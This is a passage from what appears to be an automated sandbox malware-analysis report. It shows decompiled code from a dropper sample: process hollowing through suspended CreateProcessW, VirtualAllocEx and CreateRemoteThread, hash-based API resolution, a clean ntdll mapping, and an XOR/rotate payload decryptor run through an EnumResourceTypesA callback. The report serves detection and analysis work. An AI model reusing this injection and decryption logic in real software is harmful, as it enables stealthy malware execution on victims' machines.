							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42b0a8 - 0x5c;
					if( *0x42b0a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405EC2(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004056BA(_t72);
							E0040587F(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404EB3(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404EB3(0xfffffff1, _t72);
							return E00405915(__eflags, _t72, 0);
						}
						L33:
						 *0x42eca8 =  *0x42eca8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















              0x004054f7
              0x004054fb
              0x00405504
              0x00405507
              0x0040550a
              0x00405512
              0x00405514
              0x00405515
              0x00000000
              0x00405515
              0x00405524
              0x00405524
              0x00405527
              0x0040552a
              0x0040553e
              0x00405545
              0x0040554a
              0x0040554c
              0x0040555c
              0x0040554e
              0x00405554
              0x00405554
              0x00405561
              0x00405564
              0x0040556f
              0x00405575
              0x0040557a
              0x0040558a
              0x0040558c
              0x00405592
              0x00405595
              0x00405598
              0x00405655
              0x00405655
              0x00405659
              0x0040565b
              0x0040565b
              0x0040565b
              0x0040565b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040559e
              0x0040559e
              0x004055a7
              0x004055ad
              0x004055b2
              0x004055b5
              0x004055b7
              0x004055bb
              0x004055bd
              0x004055bd
              0x004055bb
              0x004055c0
              0x004055c3
              0x004055d6
              0x004055d8
              0x004055dd
              0x004055e4
              0x004055fc
              0x00405602
              0x00405608
              0x0040560a
              0x0040562f
              0x0040560c
              0x0040560c
              0x00405610
              0x00405624
              0x00405612
              0x00405615
              0x0040561d
              0x0040561d
              0x00405610
              0x004055e6
              0x004055ec
              0x004055ee
              0x004055f4
              0x004055f4
              0x004055ee
              0x00000000
              0x004055e4
              0x004055c5
              0x004055c8
              0x004055ca
              0x00000000
              0x00000000
              0x004055cc
              0x004055ce
              0x00000000
              0x00000000
              0x004055d0
              0x004055d4
              0x00000000
              0x00000000
              0x00000000
              0x00405634
              0x0040563e
              0x00405644
              0x00405644
              0x0040564f
              0x00000000
              0x0040564f
              0x00405566
              0x0040556d
              0x00000000
              0x00000000
              0x00000000
              0x0040552c
              0x0040552c
              0x0040552e
              0x0040565f
              0x00405662
              0x00405665
              0x004056b7
              0x004056b7
              0x004056b7
              0x00405667
              0x0040566a
              0x00405675
              0x0040567a
              0x0040567c
              0x00000000
              0x00000000
              0x0040567f
              0x00405685
              0x0040568b
              0x00405691
              0x00405693
              0x00000000
              0x004056af
              0x00405695
              0x00405699
              0x00000000
              0x00000000
              0x0040569e
              0x00000000
              0x004056a5
              0x0040566c
              0x0040566c
              0x00000000
              0x0040566c
              0x00405534
              0x00405538
              0x00000000
              0x00000000
              0x00000000
              0x00405538

              APIs
              • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
              • lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
              • lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
              • lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
              • FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
              • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
              • FindClose.KERNEL32(?), ref: 0040564F
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
              • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
              • API String ID: 2035342205-3287302484
              • Opcode ID: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
              • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
              • Opcode Fuzzy Hash: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
              • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 7306BF13, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 271COMMON
              Download Yara Rule
              C-Code - Quality: 32%
              			E7306BF13(intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				char _v20;
				char* _v24;
				intOrPtr _v28;
				char* _v32;
				intOrPtr _v36;
				char* _v40;
				long _v44;
				intOrPtr _v48;
				void* _v52;
				intOrPtr _v56;
				struct _PROCESS_INFORMATION _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				short _v88;
				short _v90;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				long _v136;
				intOrPtr _v156;
				void _v160;
				struct _STARTUPINFOW _v228;
				short _v1268;
				short _t136;
				short _t137;
				short _t138;
				short _t139;
				short _t140;
				short _t141;
				short _t142;
				short _t143;
				short _t144;
				signed int _t163;
				void* _t179;
				intOrPtr _t181;
				void* _t188;
				intOrPtr _t189;
				signed int _t200;

				_t136 = 0x6e;
				_v92 = _t136;
				_t137 = 0x74;
				_v90 = _t137;
				_t138 = 0x64;
				_v88 = _t138;
				_t139 = 0x6c;
				_v86 = _t139;
				_t140 = 0x6c;
				_v84 = _t140;
				_t141 = 0x2e;
				_v82 = _t141;
				_t142 = 0x64;
				_v80 = _t142;
				_t143 = 0x6c;
				_v78 = _t143;
				_t144 = 0x6c;
				_v76 = _t144;
				_v74 = 0;
				_v52 = _v52 & 0x00000000;
				_v8 = E7306B737();
				_v100 = E7306B7E6(_v8, 0xff7f721a);
				_v108 = E7306B7E6(_v8, 0x7fe2736c);
				_v104 = E7306B7E6(_v8, 0x7fb6c905);
				_v124 = E7306B7E6(_v8, 0x3f798a2d);
				_v132 = E7306B7E6(_v8, 0x7fe7f9c0);
				_v96 = E7306B7E6(_v8, 0x7fd6a366);
				_v112 = E7306B7E6(_v96( &_v92), 0x7f739ec6);
				_v128 = E7306B7E6(_v8, 0x7f98f12e);
				_t255 = 0x7fb1f910;
				_v116 = E7306B7E6(_v8, 0x7fb1f910);
				_push(0x103);
				_push( &_v1268);
				_push(0);
				if(_v100() != 0) {
					_v56 = _a4;
					_v16 = _a4 +  *((intOrPtr*)(_v56 + 0x3c));
					if( *_v16 == 0x4550) {
						_t163 = 8;
						_t241 = _v16;
						if( *((intOrPtr*)(_v16 + 0x7c + _t163 * 5)) != 0) {
							_v28 = 0x10;
							_v24 =  &_v72;
							while(_v28 != 0) {
								 *_v24 = 0;
								_v24 = _v24 + 1;
								_v28 = _v28 - 1;
							}
							_v36 = 0x44;
							_v32 =  &_v228;
							while(_v36 != 0) {
								 *_v32 = 0;
								_v32 = _v32 + 1;
								_v36 = _v36 - 1;
							}
							_v44 = 0x18;
							_v40 =  &_v160;
							while(_v44 != 0) {
								 *_v40 = 0;
								_v40 = _v40 + 1;
								_v44 = _v44 - 1;
							}
							if(CreateProcessW( &_v1268, _v104(), 0, 0, 0, 4, 0, 0,  &_v228,  &_v72) != 0) {
								NtQueryInformationProcess(_v72.hProcess, 0,  &_v160, 0x18,  &_v136);
								_v20 = VirtualAllocEx(_v72.hProcess, 0,  *(_v16 + 0x50), 0x3000, 0x40);
								if(_v20 != 0) {
									_push(0);
									_push( *((intOrPtr*)(_v16 + 0x54)));
									_push(_a4);
									_push(_v20);
									_push(_v72.hProcess);
									_t179 = E7306B2D7(_t241, _t255); // executed
									if(_t179 != 0) {
										_t181 =  *((intOrPtr*)(_v56 + 0x3c));
										_t242 = _a4;
										_t97 = _t181 + 0xf8; // 0xf8
										_v48 = _a4 + _t97;
										_v12 = _v12 & 0x00000000;
										while(_v12 < ( *(_v16 + 6) & 0x0000ffff)) {
											_push(0);
											_push( *((intOrPtr*)(_v48 + 0x10 + _v12 * 0x28)));
											_push(_a4 +  *((intOrPtr*)(_v48 + 0x14 + _v12 * 0x28)));
											_t200 = _v12 * 0x28;
											_t242 = _v48;
											_t255 = _v20 +  *((intOrPtr*)(_t242 + _t200 + 0xc));
											_push(_v20 +  *((intOrPtr*)(_t242 + _t200 + 0xc)));
											_push(_v72.hProcess);
											E7306B2D7(_t242, _v20 +  *((intOrPtr*)(_t242 + _t200 + 0xc))); // executed
											_v12 = _v12 + 1;
										}
										_v120 = _v156 + 8;
										_push(0);
										_push(4);
										_push( &_v20);
										_push(_v120);
										_push(_v72.hProcess);
										_t188 = E7306B2D7(_t242, _t255); // executed
										if(_t188 != 0) {
											_t189 = _v16;
											_t244 = _v20 +  *((intOrPtr*)(_t189 + 0x28));
											_v52 = CreateRemoteThread(_v72, 0, 0, _v20 +  *((intOrPtr*)(_t189 + 0x28)), 0, 4, 0);
											if(_v52 != 0) {
												E7306B226(_t244, _t255, _v52); // executed
												SuspendThread(_v72.hThread);
												return 0;
											}
											return 1;
										}
										return 1;
									}
									return 1;
								}
								return 1;
							}
							return 1;
						}
						return E7306C23B(_a4);
					}
					return 1;
				}
				return 1;
			}

























































              0x7306bf1e
              0x7306bf1f
              0x7306bf25
              0x7306bf26
              0x7306bf2c
              0x7306bf2d
              0x7306bf33
              0x7306bf34
              0x7306bf3a
              0x7306bf3b
              0x7306bf41
              0x7306bf42
              0x7306bf48
              0x7306bf49
              0x7306bf4f
              0x7306bf50
              0x7306bf56
              0x7306bf57
              0x7306bf5d
              0x7306bf61
              0x7306bf6a
              0x7306bf7a
              0x7306bf8a
              0x7306bf9a
              0x7306bfaa
              0x7306bfba
              0x7306bfca
              0x7306bfe0
              0x7306bff0
              0x7306bff3
              0x7306c000
              0x7306c003
              0x7306c00e
              0x7306c00f
              0x7306c016
              0x7306c023
              0x7306c02f
              0x7306c03b
              0x7306c047
              0x7306c04b
              0x7306c053
              0x7306c062
              0x7306c06c
              0x7306c06f
              0x7306c078
              0x7306c07f
              0x7306c086
              0x7306c086
              0x7306c08b
              0x7306c098
              0x7306c09b
              0x7306c0a4
              0x7306c0ab
              0x7306c0b2
              0x7306c0b2
              0x7306c0b7
              0x7306c0c4
              0x7306c0c7
              0x7306c0d0
              0x7306c0d7
              0x7306c0de
              0x7306c0de
              0x7306c10a
              0x7306c129
              0x7306c141
              0x7306c148
              0x7306c152
              0x7306c157
              0x7306c15a
              0x7306c15d
              0x7306c160
              0x7306c163
              0x7306c16a
              0x7306c177
              0x7306c17a
              0x7306c17d
              0x7306c184
              0x7306c187
              0x7306c194
              0x7306c1a0
              0x7306c1a9
              0x7306c1bb
              0x7306c1bc
              0x7306c1c0
              0x7306c1c6
              0x7306c1ca
              0x7306c1cb
              0x7306c1ce
              0x7306c191
              0x7306c191
              0x7306c1de
              0x7306c1e1
              0x7306c1e3
              0x7306c1e8
              0x7306c1e9
              0x7306c1ec
              0x7306c1ef
              0x7306c1f6
              0x7306c203
              0x7306c209
              0x7306c217
              0x7306c21e
              0x7306c228
              0x7306c230
              0x00000000
              0x7306c233
              0x00000000
              0x7306c222
              0x00000000
              0x7306c1fa
              0x00000000
              0x7306c16e
              0x00000000
              0x7306c14c
              0x00000000
              0x7306c10e
              0x00000000
              0x7306c058
              0x00000000
              0x7306c03f
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID: D
              • API String ID: 0-2746444292
              • Opcode ID: e1f5ae983d32ee915ab5497fe06861bbfc5f0196f260ecb4dce48228ef041784
              • Instruction ID: d5d5f5d46deea738518ee5868bb4313de4a04461601f9d14d0fb26d9bb152596
              • Opcode Fuzzy Hash: e1f5ae983d32ee915ab5497fe06861bbfc5f0196f260ecb4dce48228ef041784
              • Instruction Fuzzy Hash: 80B11870E40209EFEB51CFE4C981BADBBF5BF48B04F204469E656EB294E7749A41CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 7306B472, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E7306B472(void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				long _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				char _v60;
				short _t60;
				short _t61;
				short _t62;
				void* _t78;
				void* _t79;
				void _t81;
				long _t86;
				void* _t91;
				void* _t95;
				void* _t100;
				void* _t102;
				short _t103;
				short _t120;
				signed int _t133;
				void* _t135;
				void* _t136;
				void* _t138;
				void* _t139;
				void* _t141;
				void* _t142;

				_t142 = __eflags;
				_t60 = 0x6e;
				_v60 = _t60;
				_t100 = 0;
				_t61 = 0x74;
				_t103 = 0x64;
				_t120 = 0x6c;
				_v58 = _t61;
				_t62 = 0x2e;
				_v50 = _t62;
				_v56 = _t103;
				_v54 = _t120;
				_v52 = _t120;
				_v48 = _t103;
				_v46 = _t120;
				_v44 = _t120;
				_v42 = 0;
				_t137 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				E7306B7E6( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fe63623);
				_v16 = E7306B7E6( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fbd727f);
				_v12 = E7306B7E6(_t137, 0x7fb47add);
				_v32 = E7306B7E6(_t137, 0x7fe7f840);
				_v24 = E7306B7E6(_t137, 0x7fe1f1fb);
				_v28 = E7306B7E6(_t137, 0x7f951704);
				_v36 = E7306B7E6(_t137, 0x7f91a078);
				_t78 = CreateFileW(E7306B7B4( &_v60, _t142), 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_t138 = _t78;
				_v20 = _t138;
				if(_t138 == 0xffffffff) {
					L13:
					_t139 = _t100;
					L14:
					_t79 = _v20;
					__eflags = _t79;
					if(_t79 != 0) {
						_v24(_t79);
					}
					_v36(0);
					L22:
					while( *_t100 != 0xb8) {
						_t81 =  *_t100;
						__eflags = _t81 - 0xe9;
						if(_t81 != 0xe9) {
							__eflags = _t81 - 0xea;
							if(_t81 != 0xea) {
								_t100 = _t100 + 1;
								__eflags = _t100;
							} else {
								_t100 =  *(_t100 + 1);
							}
						} else {
							_t100 = _t100 + 5 +  *(_t100 + 1);
						}
					}
					_t135 =  *(_t100 + 1);
					if(_t139 != 0) {
						VirtualFree(_t139, 0, 0x8000);
					}
					return _t135;
				}
				_t86 = _v16(_t138, 0);
				_v16 = _t86;
				if(_t86 == 0xffffffff) {
					goto L13;
				}
				_t136 = VirtualAlloc(0, _t86, 0x3000, 4);
				if(_t136 == 0 || ReadFile(_t138, _t136, _v16,  &_v40, 0) == 0) {
					goto L13;
				} else {
					_t141 =  *((intOrPtr*)(_t136 + 0x3c)) + _t136;
					_v32 =  *(_t141 + 0x14) & 0x0000ffff;
					_t91 = VirtualAlloc(0,  *(_t141 + 0x50), 0x3000, 4);
					_v8 = _t91;
					if(_t91 == 0) {
						_t139 = _t91;
						goto L14;
					}
					E7306B74B(_t91, _t136,  *((intOrPtr*)(_t141 + 0x54)));
					_v12 = _v12 & 0;
					if(0 >=  *(_t141 + 6)) {
						L8:
						_t139 = _v8;
						_t100 = E7306B7E6(_t139, _a4);
						if(_t100 == 0) {
							goto L14;
						}
						_t95 = _v20;
						if(_t95 != 0) {
							CloseHandle(_t95);
						}
						VirtualFree(_t136, 0, 0x8000);
						goto L22;
					} else {
						_t102 = _v8;
						_t116 = _v32 + 0x2c + _t141;
						_v16 = _v32 + 0x2c + _t141;
						do {
							E7306B74B( *((intOrPtr*)(_t116 - 8)) + _t102,  *_t116 + _t136,  *((intOrPtr*)(_t116 - 4)));
							_t133 = _v12 + 1;
							_t116 = _v16 + 0x28;
							_v12 = _t133;
							_v16 = _v16 + 0x28;
						} while (_t133 < ( *(_t141 + 6) & 0x0000ffff));
						goto L8;
					}
				}
			}










































              0x7306b472
              0x7306b47d
              0x7306b480
              0x7306b484
              0x7306b486
              0x7306b489
              0x7306b48c
              0x7306b48d
              0x7306b493
              0x7306b494
              0x7306b49a
              0x7306b49e
              0x7306b4a2
              0x7306b4a6
              0x7306b4aa
              0x7306b4ae
              0x7306b4b2
              0x7306b4c9
              0x7306b4d2
              0x7306b4ea
              0x7306b4f9
              0x7306b508
              0x7306b517
              0x7306b526
              0x7306b543
              0x7306b54c
              0x7306b54e
              0x7306b550
              0x7306b556
              0x7306b636
              0x7306b636
              0x7306b638
              0x7306b638
              0x7306b63b
              0x7306b63d
              0x7306b640
              0x7306b640
              0x7306b645
              0x00000000
              0x7306b664
              0x7306b64a
              0x7306b64c
              0x7306b64e
              0x7306b65a
              0x7306b65c
              0x7306b663
              0x7306b663
              0x7306b65e
              0x7306b65e
              0x7306b65e
              0x7306b650
              0x7306b656
              0x7306b656
              0x7306b64e
              0x7306b669
              0x7306b66e
              0x7306b678
              0x7306b678
              0x7306b683
              0x7306b683
              0x7306b55e
              0x7306b561
              0x7306b567
              0x00000000
              0x00000000
              0x7306b579
              0x7306b57d
              0x00000000
              0x7306b598
              0x7306b59d
              0x7306b5ac
              0x7306b5af
              0x7306b5b2
              0x7306b5b7
              0x7306b632
              0x00000000
              0x7306b632
              0x7306b5c0
              0x7306b5c5
              0x7306b5ce
              0x7306b607
              0x7306b607
              0x7306b614
              0x7306b618
              0x00000000
              0x00000000
              0x7306b61a
              0x7306b61f
              0x7306b622
              0x7306b622
              0x7306b62d
              0x00000000
              0x7306b5d0
              0x7306b5d3
              0x7306b5d9
              0x7306b5db
              0x7306b5de
              0x7306b5ea
              0x7306b5f5
              0x7306b5fa
              0x7306b5fd
              0x7306b600
              0x7306b603
              0x00000000
              0x7306b5de
              0x7306b5ce

              APIs
              • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 7306B54C
              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,7306B1FA,7FC6FA16,7306B3B9), ref: 7306B576
              • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,7306B1FA,7FC6FA16), ref: 7306B58D
              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,7306B1FA,7FC6FA16,7306B3B9), ref: 7306B5AF
              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,7306B1FA,7FC6FA16,7306B3B9,00000000,00000000), ref: 7306B622
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,7306B1FA,7FC6FA16,7306B3B9), ref: 7306B62D
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,7306B1FA,7FC6FA16,7306B3B9,00000000), ref: 7306B678
              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
              • String ID:
              • API String ID: 721982790-0
              • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
              • Instruction ID: 7f6fe46324a56d2e56e1acd1e38410d6b4917a38910e9a7c5f698399a49b801b
              • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
              • Instruction Fuzzy Hash: 356170B5E00704EBDF11CFA5C890BAEB7B6AF48A10F148059F506EB394EB749D02CB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 73067500, Relevance: 3.2, APIs: 2, Instructions: 183memoryCOMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E73067500(void* __ecx) {
				signed int _v5;
				signed int _v12;
				struct HINSTANCE__* _v16;
				void* _t111;
				int _t114;
				void* _t153;

				_t153 = __ecx;
				_v16 = 0;
				_t111 = VirtualAlloc(0, 0xbebc200, 0x3000, 4); // executed
				_v16 = _t111;
				if(_v16 != 0) {
					E730677D0(_t153, _v16, 0xbebc200);
					_v12 = 0;
					_v12 = 0;
					while(_v12 < 0x1495) {
						_t11 = E7306B070 + _v12; // 0x25000000
						_v5 =  *_t11;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) + 0xdc;
						_v5 = _v5 & 0x000000ff ^ 0x00000074;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ 0x00000043;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) + 0xbc;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0xd9;
						_v5 = _v5 & 0x000000ff ^ 0x0000008d;
						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x00000021;
						_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = _v5 & 0x000000ff ^ 0x000000f3;
						_v5 = (_v5 & 0x000000ff) - 0x14;
						_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
						_v5 = (_v5 & 0x000000ff) + 0x96;
						_v5 = _v5 & 0x000000ff ^ 0x000000e9;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = _v5 & 0x000000ff ^ 0x0000002b;
						_v5 = (_v5 & 0x000000ff) + 0xf7;
						_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x0000001b;
						_v5 = (_v5 & 0x000000ff) - 0x82;
						_v5 = _v5 & 0x000000ff ^ 0x000000e1;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = _v5 & 0x000000ff ^ 0x000000a0;
						_v5 = (_v5 & 0x000000ff) + 0x26;
						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
						_v5 =  ~(_v5 & 0x000000ff);
						 *((char*)(E7306B070 + _v12)) = _v5;
						_v12 = _v12 + 1;
					}
					_t114 = EnumResourceTypesA(0, E7306B070, 0); // executed
					return _t114;
				}
				return _t111;
			}









              0x73067500
              0x73067506
              0x7306751b
              0x73067521
              0x73067528
              0x73067537
              0x7306753f
              0x73067546
              0x73067558
              0x73067568
              0x7306756e
              0x73067577
              0x73067581
              0x73067593
              0x730675a0
              0x730675aa
              0x730675b4
              0x730675be
              0x730675d0
              0x730675dd
              0x730675e6
              0x730675ef
              0x730675fc
              0x73067608
              0x7306761b
              0x73067625
              0x7306762e
              0x73067638
              0x7306764a
              0x73067654
              0x73067660
              0x7306766a
              0x7306767d
              0x7306768a
              0x73067697
              0x730676a1
              0x730676ab
              0x730676b8
              0x730676ca
              0x730676d3
              0x730676dd
              0x730676ea
              0x730676f7
              0x73067700
              0x73067712
              0x7306771e
              0x73067728
              0x7306773b
              0x73067745
              0x73067757
              0x73067760
              0x73067769
              0x73067555
              0x73067555
              0x7306777d
              0x00000000
              0x7306777d
              0x73067786

              APIs
              • VirtualAlloc.KERNELBASE(00000000,0BEBC200,00003000,00000004), ref: 7306751B
              • EnumResourceTypesA.KERNEL32(00000000,7306B070,00000000), ref: 7306777D
              Memory Dump Source
              • Source File: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AllocEnumResourceTypesVirtual
              • String ID:
              • API String ID: 1791965044-0
              • Opcode ID: 52580722b79e844493d141f484e7b6c488752fe60a76ddc34854235fcc8fc66f
              • Instruction ID: 03c94455431d803c14ceb2a4c77731fa1ab3addc41c78b8cebac9e740afd6a86
              • Opcode Fuzzy Hash: 52580722b79e844493d141f484e7b6c488752fe60a76ddc34854235fcc8fc66f
              • Instruction Fuzzy Hash: 7D81A454C4D2E8A9DB16C7FA54643ECBFB15F67102F0881DAE0E1A6387C47A538EDB21
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405EC2, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405EC2(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0f0;
			}




              0x00405ecd
              0x00405ed6
              0x00000000
              0x00405ee3
              0x00405ed9
              0x00000000

              APIs
              • FindFirstFileA.KERNELBASE(?,0042C0F0,0042B4A8,004057DE,0042B4A8,0042B4A8,00000000,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
              • FindClose.KERNEL32(00000000), ref: 00405ED9
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
